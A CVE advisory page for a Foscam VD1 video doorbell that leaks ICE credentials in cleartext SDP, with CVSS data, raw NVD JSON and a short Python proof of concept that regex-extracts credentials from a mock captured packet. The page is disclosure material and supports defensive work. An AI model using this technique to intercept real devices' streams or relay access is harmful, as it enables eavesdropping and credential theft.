Security Vulnerability Report
中文
CVE-2026-38740 CVSS 5.3 MEDIUM

CVE-2026-38740

Published: 2026-05-14 19:16:33
Last Modified: 2026-05-15 15:16:51
Source: [email protected]

Description

Foscam VD1 Video Doorbell before V5.3.13_1072 is vulnerable to Cleartext Transmission of Sensitive Information. The device transmits sensitive Session Description Protocol (SDP), including ICE credentials and candidates, in cleartext over network interfaces. An attacker with network visibility can intercept these credentials to hijack media streams or authenticate to Foscam's TURN/relay infrastructure to forward arbitrary traffic at the vendor's expense.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Foscam VD1 Video Doorbell < V5.3.13_1072

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import re def extract_sdp_creds(packet_payload): """ Simulates parsing a captured network packet containing SDP data. Demonstrates extraction of ICE credentials from cleartext. """ # Regex to find ice-ufrag and ice-pwd attributes in SDP ufrag_match = re.search(r'a=ice-ufrag:(\S+)', packet_payload) pwd_match = re.search(r'a=ice-pwd:(\S+)', packet_payload) if ufrag_match and pwd_match: return { 'username': ufrag_match.group(1), 'password': pwd_match.group(1) } return None # Example of captured cleartext SDP data from the network mock_captured_packet = """ v=0 o=- 168432 2 IN IP4 192.168.1.10 s=Foscam Doorbell Stream c=IN IP4 192.168.1.10 a=ice-ufrag:9f8d7s6a a=ice-pwd:VulnerableSecretKey123 a=candidate:1 1 UDP 2130706431 192.168.1.10 50000 typ host """ credentials = extract_sdp_creds(mock_captured_packet) if credentials: print(f"[+] Successfully extracted ICE credentials:") print(f" Username: {credentials['username']}") print(f" Password: {credentials['password']}") print("[!] An attacker can now use these to hijack the stream or access TURN server.") else: print("[-] No credentials found in packet.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-38740", "sourceIdentifier": "[email protected]", "published": "2026-05-14T19:16:32.903", "lastModified": "2026-05-15T15:16:51.323", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Foscam VD1 Video Doorbell before V5.3.13_1072 is vulnerable to Cleartext Transmission of Sensitive Information. The device transmits sensitive Session Description Protocol (SDP), including ICE credentials and candidates, in cleartext over network interfaces. An attacker with network visibility can intercept these credentials to hijack media streams or authenticate to Foscam's TURN/relay infrastructure to forward arbitrary traffic at the vendor's expense."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-319"}]}], "references": [{"url": "https://github.com/victorGoeman/Foscam-Security-Research/blob/main/CVE-2026-38740.md", "source": "[email protected]"}, {"url": "https://github.com/victorGoeman/Foscam-Security-Research/blob/main/CVE-2026-38740.md", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.